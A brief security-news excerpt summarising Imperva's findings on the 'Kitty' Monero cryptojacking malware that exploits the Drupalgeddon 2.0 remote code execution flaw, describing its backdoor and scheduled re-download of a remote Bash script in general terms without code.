The critical remote code execution (RCE) vulnerability is an attack variant piggybacking on the Drupalgeddon 2.0 exploit.
Researchers at Imperva reported a new technique in the crypto-jacking attack trend. “During the inspection of the attacks blocked by our systems, we came across the ‘Kitty’ malware, an advanced Monero cryptocurrency miner, utilizing a ‘webminerpool,’ an open source mining software for browsers,” Imperva wrote.
Once executed, the Kitty script uses a backdoor independent of the Drupal vulnerability to establish control. A time-based job scheduler periodically re-downloads and executes a Bash script from a remote host so that the attacker can quickly make updates and changes to the infected servers.
Read entire article Cyrpto-Me0wing, Not a Cute Kitty of the Internet | InfoSecurity